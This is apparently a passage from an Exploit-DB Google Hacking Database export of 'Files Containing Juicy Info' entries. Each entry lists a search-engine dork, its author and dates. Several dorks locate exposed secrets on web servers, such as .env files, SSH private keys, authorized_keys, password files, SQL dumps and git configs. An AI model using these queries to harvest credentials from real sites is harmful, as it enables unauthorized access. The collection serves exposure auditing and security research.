<id>7738</id>
<link>https://www.exploit-db.com/ghdb/7738</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; glimpse &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; glimpse &quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot; glimpse &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; glimpse &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7737</id>
<link>https://www.exploit-db.com/ghdb/7737</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; htsearch &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; htsearch &quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot; htsearch &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; htsearch &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7740</id>
<link>https://www.exploit-db.com/ghdb/7740</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; index.php.bak &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; index.php.bak &quot;
# Files Containing Juicy Info
# Date:09/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot; index.php.bak &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; index.php.bak &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7889</id>
<link>https://www.exploit-db.com/ghdb/7889</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; index.php?id= &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; index.php?id= &quot;
# Files Containing Juicy Info
# Date:16/12/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot; index.php?id= &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; index.php?id= &quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7742</id>
<link>https://www.exploit-db.com/ghdb/7742</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; login.jsp &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; login.jsp &quot;
# Files Containing Juicy Info
# Date:09/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot; login.jsp &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; login.jsp &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7743</id>
<link>https://www.exploit-db.com/ghdb/7743</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; mod_auth_mysql &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; mod_auth_mysql &quot;
# Files Containing Juicy Info
# Date:09/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot; mod_auth_mysql &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; mod_auth_mysql &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7568</id>
<link>https://www.exploit-db.com/ghdb/7568</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; py-text&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;py-text&quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot; py-text&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; py-text&quot;</querystring>
<edb></edb>
<date>2021-11-02</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7741</id>
<link>https://www.exploit-db.com/ghdb/7741</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; sendmail.inc &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; sendmail.inc &quot;
# Files Containing Juicy Info
# Date:09/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot; sendmail.inc &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; sendmail.inc &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7567</id>
<link>https://www.exploit-db.com/ghdb/7567</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; Server-Side &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; Server-Side &quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot; Server-Side &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; Server-Side &quot;</querystring>
<edb></edb>
<date>2021-11-02</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7577</id>
<link>https://www.exploit-db.com/ghdb/7577</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; src &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; src &quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot; src &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; src &quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7578</id>
<link>https://www.exploit-db.com/ghdb/7578</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; src.hint&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; src.hint&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot; src.hint&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; src.hint&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7574</id>
<link>https://www.exploit-db.com/ghdb/7574</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; unidecode&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; unidecode&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot; unidecode&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; unidecode&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7739</id>
<link>https://www.exploit-db.com/ghdb/7739</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; webdriver &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; webdriver &quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot; webdriver &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; webdriver &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7890</id>
<link>https://www.exploit-db.com/ghdb/7890</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; wp-includes &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; wp-includes &quot;
# Files Containing Juicy Info
# Date:16/12/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot; wp-includes &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; wp-includes &quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7612</id>
<link>https://www.exploit-db.com/ghdb/7612</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; wp-mail-smtp&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; wp-mail-smtp&quot;
# Files Containing Juicy Info
# Date:03/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot; wp-mail-smtp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; wp-mail-smtp&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7736</id>
<link>https://www.exploit-db.com/ghdb/7736</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; YaBB.pl &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; YaBB.pl &quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot; YaBB.pl &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; YaBB.pl &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7765</id>
<link>https://www.exploit-db.com/ghdb/7765</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*.mp4&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*.mp4&quot;
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*.mp4&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*.mp4&quot;</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7814</id>
<link>https://www.exploit-db.com/ghdb/7814</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*.vcf&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*.vcf&quot;
# Files Containing Juicy Info
# Date:15/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*.vcf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*.vcf&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7811</id>
<link>https://www.exploit-db.com/ghdb/7811</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*.yaml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*.yaml&quot;
# Files Containing Juicy Info
# Date:15/11/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*.yaml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*.yaml&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>7658</id>
<link>https://www.exploit-db.com/ghdb/7658</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*/ftp.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*/ftp.txt&quot;
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Vivek Pancholi</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*/ftp.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*/ftp.txt&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Vivek Pancholi</author>
</entry>
<entry>
<id>8013</id>
<link>https://www.exploit-db.com/ghdb/8013</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*db.sh&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*db.sh&quot;
# Files Containing Juicy Info
# Date:27/07/2022
# Exploit Author: Yashwant Shastri</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*db.sh&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*db.sh&quot;</querystring>
<edb></edb>
<date>2022-07-27</date>
<author>Yashwant Shastri</author>
</entry>
<entry>
<id>6334</id>
<link>https://www.exploit-db.com/ghdb/6334</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*named.root.key&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*named.root.key&quot;
# Juicy information and sensitive directories.
# Date: 26/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*named.root.key&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*named.root.key&quot;</querystring>
<edb></edb>
<date>2020-06-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8327</id>
<link>https://www.exploit-db.com/ghdb/8327</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*robots.txt&quot; site:.edu</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*robots.txt&quot; site:.edu
# Files Containing Juicy Info
# Date: 07/11/2023
# Exploit: Safein Sadad</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*robots.txt&quot; site:.edu</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*robots.txt&quot; site:.edu</querystring>
<edb></edb>
<date>2023-11-07</date>
<author>Safein Sadad</author>
</entry>
<entry>
<id>6075</id>
<link>https://www.exploit-db.com/ghdb/6075</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*root.pem&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*root.pem&quot;
# Juicy and sensitive information.
# Date: 10/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*root.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*root.pem&quot;</querystring>
<edb></edb>
<date>2020-05-11</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7572</id>
<link>https://www.exploit-db.com/ghdb/7572</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;-.sql&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;-.sql&quot;
# Files Containing Juicy Info
# Date:2/11/2021
# Exploit Author: Tushar Jaiswal</textualDescription>
<query>Google Dork</query>
<querystring>https://www.google.com/search?q=Google Dork</querystring>
<edb></edb>
<date>2021-11-02</date>
<author>Tushar Jaiswal</author>
</entry>
<entry>
<id>7570</id>
<link>https://www.exploit-db.com/ghdb/7570</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;-admin&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;-admin&quot;
# Files Containing Juicy Info
# Date:2/11/2021
# Exploit Author: Tushar Jaiswal</textualDescription>
<query>Google Dork</query>
<querystring>https://www.google.com/search?q=Google Dork</querystring>
<edb></edb>
<date>2021-11-02</date>
<author>Tushar Jaiswal</author>
</entry>
<entry>
<id>7537</id>
<link>https://www.exploit-db.com/ghdb/7537</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;-ipk&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;-ipk&quot;
# Files Containing Juicy Info
# Date:30/10/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;-ipk&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;-ipk&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7588</id>
<link>https://www.exploit-db.com/ghdb/7588</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;-login.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;-login.php&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;-login.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;-login.php&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7571</id>
<link>https://www.exploit-db.com/ghdb/7571</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;-pwd&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;-pwd&quot;
# Files Containing Juicy Info
# Date:2/11/2021
# Exploit Author: Tushar Jaiswal</textualDescription>
<query>Google Dork</query>
<querystring>https://www.google.com/search?q=Google Dork</querystring>
<edb></edb>
<date>2021-11-02</date>
<author>Tushar Jaiswal</author>
</entry>
<entry>
<id>7536</id>
<link>https://www.exploit-db.com/ghdb/7536</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;-qpf&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;-qpf&quot;
# Files Containing Juicy Info
# Date:30/10/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;-qpf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;-qpf&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7554</id>
<link>https://www.exploit-db.com/ghdb/7554</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;-XML.pdf &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;-XML.pdf &quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;-XML.pdf &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;-XML.pdf &quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6187</id>
<link>https://www.exploit-db.com/ghdb/6187</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.config&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;.config&quot;
Description: This google dorks lists out config folders on web servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.config&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.config&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7915</id>
<link>https://www.exploit-db.com/ghdb/7915</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.env&quot; OR &quot;pass&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;.env&quot; OR &quot;pass&quot;
# Files Containing Juicy Info
# Date:16/06/2022
# Exploit Author: Leonardo Venegas</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.env&quot; OR &quot;pass&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.env&quot; OR &quot;pass&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Leonardo Venegas</author>
</entry>
<entry>
<id>7499</id>
<link>https://www.exploit-db.com/ghdb/7499</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.env.example&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;.env.example&quot;
# Files Containing Juicy Info
# Date:26/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.env.example&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.env.example&quot;</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Suman Das</author>
</entry>
<entry>
<id>4914</id>
<link>https://www.exploit-db.com/ghdb/4914</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.gitignore&quot;</shortDescription>
<textualDescription>Here contains information related to what the target uses as IDE, and many
other software related to development. Great for footprinting
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.gitignore&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.gitignore&quot;</querystring>
<edb></edb>
<date>2018-08-13</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7541</id>
<link>https://www.exploit-db.com/ghdb/7541</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.phpunit.xml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;.phpunit.xml&quot;
# Files Containing Juicy Info
# Date: 30/10/2021
# Exploit Author: Chinmay Divekar</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.phpunit.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.phpunit.xml&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Chinmay Divekar</author>
</entry>
<entry>
<id>7532</id>
<link>https://www.exploit-db.com/ghdb/7532</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.ppt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;.ppt&quot;
# Files Containing Juicy Info
# Date:29/10/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.ppt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.ppt&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7527</id>
<link>https://www.exploit-db.com/ghdb/7527</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.private.xml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;.private.xml&quot;
# Files Containing Juicy Info
# Date:29/10/2021
# Exploit Author: Chinmay Divekar</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.private.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.private.xml&quot;</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>Chinmay Divekar</author>
</entry>
<entry>
<id>8239</id>
<link>https://www.exploit-db.com/ghdb/8239</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.sql&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;.sql&quot;
# Files Containing Juicy Info
# Date: 12/09/2023
# Exploit Aashiq Ahamed</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.sql&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.sql&quot;</querystring>
<edb></edb>
<date>2023-09-12</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>8230</id>
<link>https://www.exploit-db.com/ghdb/8230</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.ssh&quot; OR &quot;ssh_config&quot; OR &quot;ssh_known_hosts&quot; OR &quot;authorized_keys&quot; OR &quot;id_rsa&quot; OR &quot;id_dsa&quot;</shortDescription>
<textualDescription>Google Dork: intitle:&quot;index of&quot; &quot;.ssh&quot; OR &quot;ssh_config&quot; OR &quot;ssh_known_hosts&quot; OR &quot;authorized_keys&quot; OR &quot;id_rsa&quot; OR &quot;id_dsa&quot;
# Files Containing Juicy Info
# Date: 11/09/2023
# Exploit Ritesh Sahu</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.ssh&quot; OR &quot;ssh_config&quot; OR &quot;ssh_known_hosts&quot; OR &quot;authorized_keys&quot; OR &quot;id_rsa&quot; OR &quot;id_dsa&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.ssh&quot; OR &quot;ssh_config&quot; OR &quot;ssh_known_hosts&quot; OR &quot;authorized_keys&quot; OR &quot;id_rsa&quot; OR &quot;id_dsa&quot;</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Ritesh Sahu</author>
</entry>
<entry>
<id>7621</id>
<link>https://www.exploit-db.com/ghdb/7621</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.ssh/authorized_keys&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;.ssh/authorized_keys&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Vivek Pancholi</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.ssh/authorized_keys&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.ssh/authorized_keys&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Vivek Pancholi</author>
</entry>
<entry>
<id>4917</id>
<link>https://www.exploit-db.com/ghdb/4917</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.travis.yml&quot; | &quot;.travis.xml&quot;</shortDescription>
<textualDescription>Juicy info
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.travis.yml&quot; | &quot;.travis.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.travis.yml&quot; | &quot;.travis.xml&quot;</querystring>
<edb></edb>
<date>2018-08-14</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7713</id>
<link>https://www.exploit-db.com/ghdb/7713</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/.cpanel&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/.cpanel&quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: chinmay Divekar</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/.cpanel&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/.cpanel&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Chinmay Divekar</author>
</entry>
<entry>
<id>7657</id>
<link>https://www.exploit-db.com/ghdb/7657</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/.git/config&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/.git/config&quot;
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Vivek Pancholi</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/.git/config&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/.git/config&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Vivek Pancholi</author>
</entry>
<entry>
<id>6660</id>
<link>https://www.exploit-db.com/ghdb/6660</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/.idea&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/.idea&quot;
# Sensitive directories containing juicy info and sometimes usernames and passwords.
# Date: 27/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/.idea&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/.idea&quot;</querystring>
<edb></edb>
<date>2020-11-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5980</id>
<link>https://www.exploit-db.com/ghdb/5980</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/accounts.txt&quot;</shortDescription>
<textualDescription>#Description: intitle:&quot;index of&quot; &quot;/accounts.txt&quot;
This Google dork shows juicy information about the website and their
sensitive data.
An attacker can further misuse this to conduct attacks.
#Author : Tushar Kurunkar
#Date : 30 April 2020
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/accounts.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/accounts.txt&quot;</querystring>
<edb></edb>
<date>2020-05-01</date>
<author>Tushar Kurunkar</author>
</entry>
<entry>
<id>7373</id>
<link>https://www.exploit-db.com/ghdb/7373</link>
<category>Files Containing Juicy Info</category>
